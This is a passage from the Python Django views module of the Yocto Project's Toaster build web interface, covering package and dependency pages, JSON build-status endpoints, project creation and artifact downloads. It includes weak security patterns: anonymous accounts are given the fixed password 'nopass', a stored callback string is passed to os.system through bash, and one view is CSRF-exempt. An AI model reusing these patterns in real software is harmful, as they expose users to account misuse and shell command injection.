'depends_on_id' : dep_package.id,\n 'installed' : installed,\n }\n\n if target_id != INVALID_KEY:\n dep['alias'] = _get_package_alias(dep_package)\n\n if idep.dep_type == rdepends_type :\n runtime_deps.append(dep)\n elif idep.dep_type in other_depends_types :\n other_deps.append(dep)\n\n rdep_sorted = sorted(runtime_deps, key=lambda k: k['name'])\n odep_sorted = sorted(\n sorted(other_deps, key=lambda k: k['name']),\n key=lambda k: k['dep_type'])\n retvalues = {'runtime_deps' : rdep_sorted, 'other_deps' : odep_sorted}\n return retvalues\n\n# Return the count of packages dependent on package for this target_id image\ndef _get_package_reverse_dep_count(package, target_id):\n return package.package_dependencies_target.filter(target_id__exact=target_id, dep_type__exact = Package_Dependency.TYPE_TRDEPENDS).count()\n\n# Return the count of the packages that this package_id is dependent on.\n# Use one of the two RDEPENDS types, either TRDEPENDS if the package was\n# installed, or else RDEPENDS if only built.\ndef _get_package_dependency_count(package, target_id, is_installed):\n if is_installed :\n return package.package_dependencies_source.filter(target_id__exact = target_id,\n dep_type__exact = Package_Dependency.TYPE_TRDEPENDS).count()\n else :\n return package.package_dependencies_source.filter(dep_type__exact = Package_Dependency.TYPE_RDEPENDS).count()\n\ndef _get_package_alias(package):\n alias = package.installed_name\n if alias is not None and alias != '' and alias != package.name:\n return alias\n else:\n return ''\n\ndef _get_fullpackagespec(package):\n r = package.name\n version_good = package.version is not None and package.version != ''\n revision_good = package.revision is not None and package.revision != ''\n if version_good or revision_good:\n r += 
'_'\n if version_good:\n r += package.version\n if revision_good:\n r += '-'\n if revision_good:\n r += package.revision\n return r\n\ndef package_built_detail(request, build_id, package_id):\n template = \"package_built_detail.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n # follow convention for pagination w/ search although not used for this view\n queryset = Package_File.objects.filter(package_id__exact=package_id)\n (pagesize, orderby) = _get_parameters_values(request, 25, 'path:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby' : orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'package_built_detail', request.GET, mandatory_parameters, build_id = build_id, package_id = package_id)\n\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package_File)\n paths = _get_queryset(Package_File, queryset, filter_string, search_term, ordering_string, 'path')\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'dependency_count' : _get_package_dependency_count(package, -1, False),\n 'objects' : paths,\n 'tablecols':[\n {\n 'name':'File',\n 'orderfield': _get_toggle_order(request, \"path\"),\n 'ordericon':_get_toggle_order_icon(request, \"path\"),\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request, \"size\", True),\n 'ordericon':_get_toggle_order_icon(request, \"size\"),\n 'dclass': 'sizecol span2',\n },\n ]\n }\n if paths.all().count() < 2:\n context['disable_sort'] = True;\n\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef package_built_dependencies(request, build_id, package_id):\n template = \"package_built_dependencies.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n dependencies = _get_package_dependencies(package_id)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'runtime_deps' : dependencies['runtime_deps'],\n 'other_deps' : dependencies['other_deps'],\n 'dependency_count' : _get_package_dependency_count(package, -1, False)\n }\n return toaster_render(request, template, context)\n\n\ndef package_included_detail(request, build_id, target_id, package_id):\n template = \"package_included_detail.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n # follow convention for pagination w/ search although not used for this view\n (pagesize, orderby) = _get_parameters_values(request, 25, 'path:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby' : orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'package_included_detail', request.GET, mandatory_parameters, build_id = build_id, target_id = target_id, package_id = package_id)\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package_File)\n\n queryset = Package_File.objects.filter(package_id__exact=package_id)\n paths = _get_queryset(Package_File, queryset, filter_string, search_term, ordering_string, 'path')\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n package.alias = 
_get_package_alias(package)\n target = Target.objects.get(pk=target_id)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'target' : target,\n 'package' : package,\n 'reverse_count' : _get_package_reverse_dep_count(package, target_id),\n 'dependency_count' : _get_package_dependency_count(package, target_id, True),\n 'objects': paths,\n 'tablecols':[\n {\n 'name':'File',\n 'orderfield': _get_toggle_order(request, \"path\"),\n 'ordericon':_get_toggle_order_icon(request, \"path\"),\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request, \"size\", True),\n 'ordericon':_get_toggle_order_icon(request, \"size\"),\n 'dclass': 'sizecol span2',\n },\n ]\n }\n if paths.all().count() < 2:\n context['disable_sort'] = True\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef package_included_dependencies(request, build_id, target_id, package_id):\n template = \"package_included_dependencies.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n package.alias = _get_package_alias(package)\n target = Target.objects.get(pk=target_id)\n\n dependencies = _get_package_dependencies(package_id, target_id)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'target' : target,\n 'runtime_deps' : dependencies['runtime_deps'],\n 'other_deps' : dependencies['other_deps'],\n 'reverse_count' : _get_package_reverse_dep_count(package, target_id),\n 'dependency_count' : _get_package_dependency_count(package, target_id, True)\n }\n return toaster_render(request, template, context)\n\ndef package_included_reverse_dependencies(request, build_id, target_id, package_id):\n template = \"package_included_reverse_dependencies.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n (pagesize, orderby) = _get_parameters_values(request, 25, 'package__name:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby': orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'package_included_reverse_dependencies', request.GET, mandatory_parameters, build_id = build_id, target_id = target_id, package_id = package_id)\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package_File)\n\n queryset = Package_Dependency.objects.select_related('depends_on').filter(depends_on=package_id, target_id=target_id, dep_type=Package_Dependency.TYPE_TRDEPENDS)\n objects = _get_queryset(Package_Dependency, queryset, filter_string, search_term, ordering_string, 'package__name')\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n package.alias = _get_package_alias(package)\n target = Target.objects.get(pk=target_id)\n for o in objects:\n if o.package.version != '':\n o.package.version += '-' + o.package.revision\n o.alias = _get_package_alias(o.package)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'target' : target,\n 'objects' : objects,\n 'reverse_count' : _get_package_reverse_dep_count(package, target_id),\n 'dependency_count' : _get_package_dependency_count(package, target_id, True),\n 'tablecols':[\n {\n 'name':'Package',\n 'orderfield': _get_toggle_order(request, \"package__name\"),\n 'ordericon': _get_toggle_order_icon(request, \"package__name\"),\n },\n 
{\n 'name':'Version',\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request, \"package__size\", True),\n 'ordericon': _get_toggle_order_icon(request, \"package__size\"),\n 'dclass': 'sizecol span2',\n },\n ]\n }\n if objects.all().count() < 2:\n context['disable_sort'] = True\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef image_information_dir(request, build_id, target_id, packagefile_id):\n # stubbed for now\n return redirect(builds)\n # the context processor that supplies data used across all the pages\n\n# a context processor which runs on every request; this provides the\n# projects and non_cli_projects (i.e. projects created by the user)\n# variables referred to in templates, which used to determine the\n# visibility of UI elements like the \"New build\" button\ndef managedcontextprocessor(request):\n projects = Project.objects.all()\n ret = {\n \"projects\": projects,\n \"non_cli_projects\": projects.exclude(is_default=True),\n \"DEBUG\" : toastermain.settings.DEBUG,\n \"TOASTER_BRANCH\": toastermain.settings.TOASTER_BRANCH,\n \"TOASTER_REVISION\" : toastermain.settings.TOASTER_REVISION,\n }\n return ret\n\n# REST-based API calls to return build/building status to external Toaster\n# managers and aggregators via JSON\n\ndef _json_build_status(build_id,extend):\n build_stat = None\n try:\n build = Build.objects.get( pk = build_id )\n build_stat = {}\n build_stat['id'] = build.id\n build_stat['name'] = build.build_name\n build_stat['machine'] = build.machine\n build_stat['distro'] = build.distro\n build_stat['start'] = build.started_on\n # look up target name\n target= Target.objects.get( build = build )\n if target:\n if target.task:\n build_stat['target'] = '%s:%s' % (target.target,target.task)\n else:\n build_stat['target'] = '%s' % (target.target)\n else:\n build_stat['target'] = ''\n # look up project name\n project = Project.objects.get( build = build )\n if project:\n build_stat['project'] = project.name\n else:\n build_stat['project'] = ''\n if Build.IN_PROGRESS == build.outcome:\n now = timezone.now()\n timediff = now - build.started_on\n build_stat['seconds']='%.3f' % timediff.total_seconds()\n build_stat['clone']='%d:%d' % (build.repos_cloned,build.repos_to_clone)\n build_stat['parse']='%d:%d' % (build.recipes_parsed,build.recipes_to_parse)\n tf = Task.objects.filter(build = build)\n tfc = tf.count()\n if tfc > 0:\n tfd = tf.exclude(order__isnull=True).count()\n else:\n tfd = 0\n build_stat['task']='%d:%d' % (tfd,tfc)\n else:\n build_stat['outcome'] = build.get_outcome_text()\n timediff = build.completed_on - build.started_on\n build_stat['seconds']='%.3f' % timediff.total_seconds()\n build_stat['stop'] = build.completed_on\n messages = LogMessage.objects.all().filter(build = build)\n errors = len(messages.filter(level=LogMessage.ERROR) |\n messages.filter(level=LogMessage.EXCEPTION) |\n messages.filter(level=LogMessage.CRITICAL))\n build_stat['errors'] = errors\n warnings = len(messages.filter(level=LogMessage.WARNING))\n build_stat['warnings'] = warnings\n if extend:\n build_stat['cooker_log'] = build.cooker_log_path\n except Exception as e:\n build_state = str(e)\n return build_stat\n\ndef json_builds(request):\n build_table = []\n builds = []\n try:\n builds = Build.objects.exclude(outcome=Build.IN_PROGRESS).order_by(\"-started_on\")\n for build in builds:\n build_table.append(_json_build_status(build.id,False))\n except Exception as e:\n build_table = str(e)\n return 
JsonResponse({'builds' : build_table, 'count' : len(builds)})\n\ndef json_building(request):\n build_table = []\n builds = []\n try:\n builds = Build.objects.filter(outcome=Build.IN_PROGRESS).order_by(\"-started_on\")\n for build in builds:\n build_table.append(_json_build_status(build.id,False))\n except Exception as e:\n build_table = str(e)\n return JsonResponse({'building' : build_table, 'count' : len(builds)})\n\ndef json_build(request,build_id):\n return JsonResponse({'build' : _json_build_status(build_id,True)})\n\n\nimport toastermain.settings\n\nfrom orm.models import Project, ProjectLayer, ProjectVariable\nfrom bldcontrol.models import BuildEnvironment\n\n# we have a set of functions if we're in managed mode, or\n# a default \"page not available\" simple functions for interactive mode\n\nif True:\n from django.contrib.auth.models import User\n from django.contrib.auth import authenticate, login\n\n from orm.models import LayerSource, ToasterSetting, Release\n\n import traceback\n\n class BadParameterException(Exception):\n ''' The exception raised on invalid POST requests '''\n pass\n\n # new project\n def newproject(request):\n if not project_enable:\n return redirect( landing )\n\n template = \"newproject.html\"\n context = {\n 'email': request.user.email if request.user.is_authenticated else '',\n 'username': request.user.username if request.user.is_authenticated else '',\n 'releases': Release.objects.order_by(\"description\"),\n }\n\n try:\n context['defaultbranch'] = ToasterSetting.objects.get(name = \"DEFAULT_RELEASE\").value\n except ToasterSetting.DoesNotExist:\n pass\n\n if request.method == \"GET\":\n # render new project page\n return toaster_render(request, template, context)\n elif request.method == \"POST\":\n mandatory_fields = ['projectname', 'ptype']\n try:\n ptype = request.POST.get('ptype')\n if ptype == \"import\":\n mandatory_fields.append('importdir')\n else:\n mandatory_fields.append('projectversion')\n # make sure we have values for all mandatory_fields\n missing = [field for field in mandatory_fields if len(request.POST.get(field, '')) == 0]\n if missing:\n # set alert for missing fields\n raise BadParameterException(\"Fields missing: %s\" % \", \".join(missing))\n\n if not request.user.is_authenticated:\n user = authenticate(username = request.POST.get('username', '_anonuser'), password = 'nopass')\n if user is None:\n user = User.objects.create_user(username = request.POST.get('username', '_anonuser'), email = request.POST.get('email', ''), password = \"nopass\")\n\n user = authenticate(username = user.username, password = 'nopass')\n login(request, user)\n\n # save the project\n if ptype == \"import\":\n if not os.path.isdir('%s/conf' % request.POST['importdir']):\n raise BadParameterException(\"Bad path or missing 'conf' directory (%s)\" % request.POST['importdir'])\n from django.core import management\n management.call_command('buildimport', '--command=import', '--name=%s' % request.POST['projectname'], '--path=%s' % request.POST['importdir'])\n prj = Project.objects.get(name = request.POST['projectname'])\n prj.merged_attr = True\n prj.save()\n else:\n release = Release.objects.get(pk = request.POST.get('projectversion', None ))\n prj = Project.objects.create_project(name = request.POST['projectname'], release = release)\n prj.user_id = request.user.pk\n if 'mergeattr' == request.POST.get('mergeattr', ''):\n prj.merged_attr = True\n prj.save()\n\n return redirect(reverse(project, args=(prj.pk,)) + \"?notify=new-project\")\n\n except (IntegrityError, 
BadParameterException) as e:\n # fill in page with previously submitted values\n for field in mandatory_fields:\n context.__setitem__(field, request.POST.get(field, \"-- missing\"))\n if isinstance(e, IntegrityError) and \"username\" in str(e):\n context['alert'] = \"Your chosen username is already used\"\n else:\n context['alert'] = str(e)\n return toaster_render(request, template, context)\n\n raise Exception(\"Invalid HTTP method for this page\")\n\n # new project\n def newproject_specific(request, pid):\n if not project_enable:\n return redirect( landing )\n\n project = Project.objects.get(pk=pid)\n template = \"newproject_specific.html\"\n context = {\n 'email': request.user.email if request.user.is_authenticated else '',\n 'username': request.user.username if request.user.is_authenticated else '',\n 'releases': Release.objects.order_by(\"description\"),\n 'projectname': project.name,\n 'project_pk': project.pk,\n }\n\n # WORKAROUND: if we already know release, redirect 'newproject_specific' to 'project_specific'\n if '1' == project.get_variable('INTERNAL_PROJECT_SPECIFIC_SKIPRELEASE'):\n return redirect(reverse(project_specific, args=(project.pk,)))\n\n try:\n context['defaultbranch'] = ToasterSetting.objects.get(name = \"DEFAULT_RELEASE\").value\n except ToasterSetting.DoesNotExist:\n pass\n\n if request.method == \"GET\":\n # render new project page\n return toaster_render(request, template, context)\n elif request.method == \"POST\":\n mandatory_fields = ['projectname', 'ptype']\n try:\n ptype = request.POST.get('ptype')\n if ptype == \"build\":\n mandatory_fields.append('projectversion')\n # make sure we have values for all mandatory_fields\n missing = [field for field in mandatory_fields if len(request.POST.get(field, '')) == 0]\n if missing:\n # set alert for missing fields\n raise BadParameterException(\"Fields missing: %s\" % \", \".join(missing))\n\n if not request.user.is_authenticated:\n user = authenticate(username = request.POST.get('username', '_anonuser'), password = 'nopass')\n if user is None:\n user = User.objects.create_user(username = request.POST.get('username', '_anonuser'), email = request.POST.get('email', ''), password = \"nopass\")\n\n user = authenticate(username = user.username, password = 'nopass')\n login(request, user)\n\n # save the project\n if ptype == \"analysis\":\n release = None\n else:\n release = Release.objects.get(pk = request.POST.get('projectversion', None ))\n\n prj = Project.objects.create_project(name = request.POST['projectname'], release = release, existing_project = project)\n prj.user_id = request.user.pk\n prj.save()\n return redirect(reverse(project_specific, args=(prj.pk,)) + \"?notify=new-project\")\n\n except (IntegrityError, BadParameterException) as e:\n # fill in page with previously submitted values\n for field in mandatory_fields:\n context.__setitem__(field, request.POST.get(field, \"-- missing\"))\n if isinstance(e, IntegrityError) and \"username\" in str(e):\n context['alert'] = \"Your chosen username is already used\"\n else:\n context['alert'] = str(e)\n return toaster_render(request, template, context)\n\n raise Exception(\"Invalid HTTP method for this page\")\n\n # Shows the edit project page\n def project(request, pid):\n project = Project.objects.get(pk=pid)\n\n if '1' == os.environ.get('TOASTER_PROJECTSPECIFIC'):\n if request.GET:\n #Example:request.GET=\n params = urlencode(request.GET).replace('%5B%27','').replace('%27%5D','')\n return redirect(\"%s?%s\" % (reverse(project_specific, 
args=(project.pk,)),params))\n else:\n return redirect(reverse(project_specific, args=(project.pk,)))\n context = {\"project\": project}\n return toaster_render(request, \"project.html\", context)\n\n # Shows the edit project-specific page\n def project_specific(request, pid):\n project = Project.objects.get(pk=pid)\n\n # Are we refreshing from a successful project specific update clone?\n if Project.PROJECT_SPECIFIC_CLONING_SUCCESS == project.get_variable(Project.PROJECT_SPECIFIC_STATUS):\n return redirect(reverse(landing_specific,args=(project.pk,)))\n\n context = {\n \"project\": project,\n \"is_new\" : project.get_variable(Project.PROJECT_SPECIFIC_ISNEW),\n \"default_image_recipe\" : project.get_variable(Project.PROJECT_SPECIFIC_DEFAULTIMAGE),\n \"mru\" : Build.objects.all().filter(project=project,outcome=Build.IN_PROGRESS),\n }\n if project.build_set.filter(outcome=Build.IN_PROGRESS).count() > 0:\n context['build_in_progress_none_completed'] = True\n else:\n context['build_in_progress_none_completed'] = False\n return toaster_render(request, \"project.html\", context)\n\n # perform the final actions for the project specific page\n def project_specific_finalize(cmnd, pid):\n project = Project.objects.get(pk=pid)\n callback = project.get_variable(Project.PROJECT_SPECIFIC_CALLBACK)\n if \"update\" == cmnd:\n # Delete all '_PROJECT_PREPARE_' builds\n for b in Build.objects.all().filter(project=project):\n delete_build = False\n for t in b.target_set.all():\n if '_PROJECT_PREPARE_' == t.target:\n delete_build = True\n if delete_build:\n from django.core import management\n management.call_command('builddelete', str(b.id), interactive=False)\n # perform callback at this last moment if defined, in case Toaster gets shutdown next\n default_target = project.get_variable(Project.PROJECT_SPECIFIC_DEFAULTIMAGE)\n if callback:\n callback = callback.replace(\"\",default_target)\n if \"cancel\" == cmnd:\n if callback:\n callback = callback.replace(\"\",\"none\")\n callback = callback.replace(\"--update\",\"--cancel\")\n # perform callback at this last moment if defined, in case this Toaster gets shutdown next\n ret = ''\n if callback:\n ret = os.system('bash -c \"%s\"' % callback)\n project.set_variable(Project.PROJECT_SPECIFIC_CALLBACK,'')\n # Delete the temp project specific variables\n project.set_variable(Project.PROJECT_SPECIFIC_ISNEW,'')\n project.set_variable(Project.PROJECT_SPECIFIC_STATUS,Project.PROJECT_SPECIFIC_NONE)\n # WORKAROUND: Release this workaround flag\n project.set_variable('INTERNAL_PROJECT_SPECIFIC_SKIPRELEASE','')\n\n # Shows the final landing page for project specific update\n def landing_specific(request, pid):\n project_specific_finalize(\"update\", pid)\n context = {\n \"install_dir\": os.environ['TOASTER_DIR'],\n }\n return toaster_render(request, \"landing_specific.html\", context)\n\n # Shows the related landing-specific page\n def landing_specific_cancel(request, pid):\n project_specific_finalize(\"cancel\", pid)\n context = {\n \"install_dir\": os.environ['TOASTER_DIR'],\n \"status\": \"cancel\",\n }\n return toaster_render(request, \"landing_specific.html\", context)\n\n def jsunittests(request):\n \"\"\" Provides a page for the js unit tests \"\"\"\n bbv = BitbakeVersion.objects.filter(branch=\"master\").first()\n release = Release.objects.filter(bitbake_version=bbv).first()\n\n name = \"_js_unit_test_prj_\"\n\n # If there is an existing project by this name delete it.\n # We don't want Lots of duplicates cluttering up the projects.\n 
Project.objects.filter(name=name).delete()\n\n new_project = Project.objects.create_project(name=name,\n release=release)\n # Add a layer\n layer = new_project.get_all_compatible_layer_versions().first()\n\n ProjectLayer.objects.get_or_create(layercommit=layer,\n project=new_project)\n\n # make sure we have a machine set for this project\n ProjectVariable.objects.get_or_create(project=new_project,\n name=\"MACHINE\",\n value=\"qemux86\")\n context = {'project': new_project}\n return toaster_render(request, \"js-unit-tests.html\", context)\n\n from django.views.decorators.csrf import csrf_exempt\n @csrf_exempt\n @log_view_mixin\n def xhr_testreleasechange(request, pid):\n def response(data):\n return HttpResponse(jsonfilter(data),\n content_type=\"application/json\")\n\n \"\"\" returns layer versions that would be deleted on the new\n release__pk \"\"\"\n try:\n prj = Project.objects.get(pk = pid)\n new_release_id = request.GET['new_release_id']\n\n # If we're already on this project do nothing\n if prj.release.pk == int(new_release_id):\n return reponse({\"error\": \"ok\", \"rows\": []})\n\n retval = []\n\n for project in prj.projectlayer_set.all():\n release = Release.objects.get(pk = new_release_id)\n\n layer_versions = prj.get_all_compatible_layer_versions()\n layer_versions = layer_versions.filter(release = release)\n layer_versions = layer_versions.filter(layer__name = project.layercommit.layer.name)\n\n # there is no layer_version with the new release id,\n # and the same name\n if layer_versions.count() < 1:\n retval.append(project)\n\n return response({\"error\":\"ok\",\n \"rows\": [_lv_to_dict(prj) for y in [x.layercommit for x in retval]]\n })\n\n except Exception as e:\n return response({\"error\": str(e) })\n\n @log_view_mixin\n def xhr_configvaredit(request, pid):\n try:\n prj = Project.objects.get(id = pid)\n # There are cases where user can add variables which hold values\n # like http://, file:/// etc. In such case a simple split(\":\")\n # would fail. One example is SSTATE_MIRRORS variable. 
So we use\n # max_split var to handle them.\n max_split = 1\n # add conf variables\n if 'configvarAdd' in request.POST:\n t=request.POST['configvarAdd'].strip()\n if \":\" in t:\n variable, value = t.split(\":\", max_split)\n else:\n variable = t\n value = \"\"\n\n pt, created = ProjectVariable.objects.get_or_create(project = prj, name = variable, value = value)\n # change conf variables\n if 'configvarChange' in request.POST:\n t=request.POST['configvarChange'].strip()\n if \":\" in t:\n variable, value = t.split(\":\", max_split)\n else:\n variable = t\n value = \"\"\n\n pt, created = ProjectVariable.objects.get_or_create(project = prj, name = variable)\n pt.value=value\n pt.save()\n # remove conf variables\n if 'configvarDel' in request.POST:\n t=request.POST['configvarDel'].strip()\n pt = ProjectVariable.objects.get(pk = int(t)).delete()\n\n # return all project settings, filter out disallowed and elsewhere-managed variables\n vars_managed,vars_fstypes,vars_disallowed = get_project_configvars_context()\n configvars_query = ProjectVariable.objects.filter(project_id = pid).all()\n for var in vars_managed:\n configvars_query = configvars_query.exclude(name = var)\n for var in vars_disallowed:\n configvars_query = configvars_query.exclude(name = var)\n\n return_data = {\n \"error\": \"ok\",\n 'configvars': [(x.name, x.value, x.pk) for x in configvars_query]\n }\n try:\n return_data['distro'] = ProjectVariable.objects.get(project = prj, name = \"DISTRO\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['dl_dir'] = ProjectVariable.objects.get(project = prj, name = \"DL_DIR\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['fstypes'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_FSTYPES\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['image_install:append'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_INSTALL:append\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['package_classes'] = ProjectVariable.objects.get(project = prj, name = \"PACKAGE_CLASSES\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['sstate_dir'] = ProjectVariable.objects.get(project = prj, name = \"SSTATE_DIR\").value,\n except ProjectVariable.DoesNotExist:\n pass\n\n return HttpResponse(json.dumps( return_data ), content_type = \"application/json\")\n\n except Exception as e:\n return HttpResponse(json.dumps({\"error\":str(e) + \"\\n\" + traceback.format_exc()}), content_type = \"application/json\")\n\n\n @log_view_mixin\n def customrecipe_download(request, pid, recipe_id):\n recipe = get_object_or_404(CustomImageRecipe, pk=recipe_id)\n\n file_data = recipe.generate_recipe_file_contents()\n\n response = HttpResponse(file_data, content_type='text/plain')\n response['Content-Disposition'] = \\\n 'attachment; filename=\"%s_%s.bb\"' % (recipe.name,\n recipe.version)\n\n return response\n\n def importlayer(request, pid):\n template = \"importlayer.html\"\n context = {\n 'project': Project.objects.get(id=pid),\n }\n return toaster_render(request, template, context)\n\n def layerdetails(request, pid, layerid):\n project = Project.objects.get(pk=pid)\n layer_version = Layer_Version.objects.get(pk=layerid)\n\n project_layers = ProjectLayer.objects.filter(\n project=project).values_list(\"layercommit_id\",\n flat=True)\n\n context = {\n 'project': project,\n 'layer_source': LayerSource.types_dict(),\n 'layerversion': layer_version,\n 'layerdeps': {\n \"list\": [\n {\n 
\"id\": dep.id,\n \"name\": dep.layer.name,\n \"layerdetailurl\": reverse('layerdetails',\n args=(pid, dep.pk)),\n \"vcs_url\": dep.layer.vcs_url,\n \"vcs_reference\": dep.get_vcs_reference()\n }\n for dep in layer_version.get_alldeps(project.id)]\n },\n 'projectlayers': list(project_layers)\n }\n\n return toaster_render(request, 'layerdetails.html', context)\n\n\n def get_project_configvars_context():\n # Vars managed outside of this view\n vars_managed = {\n 'MACHINE', 'BBLAYERS'\n }\n\n vars_disallowed = {\n 'PARALLEL_MAKE','BB_NUMBER_THREADS',\n 'BB_DISKMON_DIRS','BB_NUMBER_THREADS','CVS_PROXY_HOST','CVS_PROXY_PORT',\n 'PARALLEL_MAKE','TMPDIR',\n 'all_proxy','ftp_proxy','http_proxy ','https_proxy'\n }\n\n vars_fstypes = Target_Image_File.SUFFIXES\n\n return(vars_managed,sorted(vars_fstypes),vars_disallowed)\n\n def projectconf(request, pid):\n\n try:\n prj = Project.objects.get(id = pid)\n except Project.DoesNotExist:\n return HttpResponseNotFound(\"
Project id \" + pid + \" is unavailable
\")\n\n # remove disallowed and externally managed varaibles from this list\n vars_managed,vars_fstypes,vars_disallowed = get_project_configvars_context()\n configvars = ProjectVariable.objects.filter(project_id = pid).all()\n for var in vars_managed:\n configvars = configvars.exclude(name = var)\n for var in vars_disallowed:\n configvars = configvars.exclude(name = var)\n\n context = {\n 'project': prj,\n 'configvars': configvars,\n 'vars_managed': vars_managed,\n 'vars_fstypes': vars_fstypes,\n 'vars_disallowed': vars_disallowed,\n }\n\n try:\n context['distro'] = ProjectVariable.objects.get(project = prj, name = \"DISTRO\").value\n context['distro_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n if ProjectVariable.objects.get(project = prj, name = \"DL_DIR\").value == \"${TOPDIR}/../downloads\":\n be = BuildEnvironment.objects.get(pk = str(1))\n dl_dir = os.path.join(dirname(be.builddir), \"downloads\")\n context['dl_dir'] = dl_dir\n pv, created = ProjectVariable.objects.get_or_create(project = prj, name = \"DL_DIR\")\n pv.value = dl_dir\n pv.save()\n else:\n context['dl_dir'] = ProjectVariable.objects.get(project = prj, name = \"DL_DIR\").value\n context['dl_dir_defined'] = \"1\"\n except (ProjectVariable.DoesNotExist, BuildEnvironment.DoesNotExist):\n pass\n try:\n context['fstypes'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_FSTYPES\").value\n context['fstypes_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n context['image_install:append'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_INSTALL:append\").value\n context['image_install_append_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n context['package_classes'] = ProjectVariable.objects.get(project = prj, name = \"PACKAGE_CLASSES\").value\n context['package_classes_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n if ProjectVariable.objects.get(project = prj, name = \"SSTATE_DIR\").value == \"${TOPDIR}/../sstate-cache\":\n be = BuildEnvironment.objects.get(pk = str(1))\n sstate_dir = os.path.join(dirname(be.builddir), \"sstate-cache\")\n context['sstate_dir'] = sstate_dir\n pv, created = ProjectVariable.objects.get_or_create(project = prj, name = \"SSTATE_DIR\")\n pv.value = sstate_dir\n pv.save()\n else:\n context['sstate_dir'] = ProjectVariable.objects.get(project = prj, name = \"SSTATE_DIR\").value\n context['sstate_dir_defined'] = \"1\"\n except (ProjectVariable.DoesNotExist, BuildEnvironment.DoesNotExist):\n pass\n\n return toaster_render(request, \"projectconf.html\", context)\n\n def _file_names_for_artifact(build, artifact_type, artifact_id):\n \"\"\"\n Return a tuple (file path, file name for the download response) for an\n artifact of type artifact_type with ID artifact_id for build; if\n artifact type is not supported, returns (None, None)\n \"\"\"\n file_name = None\n response_file_name = None\n\n if artifact_type == \"cookerlog\":\n file_name = build.cooker_log_path\n response_file_name = \"cooker.log\"\n\n elif artifact_type == \"imagefile\":\n file_name = Target_Image_File.objects.get(target__build = build, pk = artifact_id).file_name\n\n elif artifact_type == \"targetkernelartifact\":\n target = TargetKernelFile.objects.get(pk=artifact_id)\n file_name = target.file_name\n\n elif artifact_type == \"targetsdkartifact\":\n target = TargetSDKFile.objects.get(pk=artifact_id)\n file_name = target.file_name\n\n elif artifact_type == \"licensemanifest\":\n file_name = Target.objects.get(build = 
build, pk = artifact_id).license_manifest_path\n\n elif artifact_type == \"packagemanifest\":\n file_name = Target.objects.get(build = build, pk = artifact_id).package_manifest_path\n\n elif artifact_type == \"tasklogfile\":\n file_name = Task.objects.get(build = build, pk = artifact_id).logfile\n\n elif artifact_type == \"logmessagefile\":\n file_name = LogMessage.objects.get(build = build, pk = artifact_id).pathname\n\n if file_name and not response_file_name:\n response_file_name = os.path.basename(file_name)\n\n return (file_name, response_file_name)\n\n def build_artifact(request, build_id, artifact_type, artifact_id):\n \"\"\"\n View which returns a build artifact file as a response\n \"\"\"\n file_name = None\n response_file_name = None\n\n try:\n build = Build.objects.get(pk = build_id)\n file_name, response_file_name = _file_names_for_artifact(\n build, artifact_type, artifact_id\n )\n\n if file_name and response_file_name:\n fsock = open(file_name, \"rb\")\n content_type = MimeTypeFinder.get_mimetype(file_name)\n\n response = HttpResponse(fsock, content_type = content_type)\n\n disposition = \"attachment; filename=\" + response_file_name\n response[\"Content-Disposition\"] = disposition\n\n return response\n else:\n return toaster_render(request, \"unavailable_artifact.html\")\n except (ObjectDoesNotExist, IOError):\n return toaster_render(request, 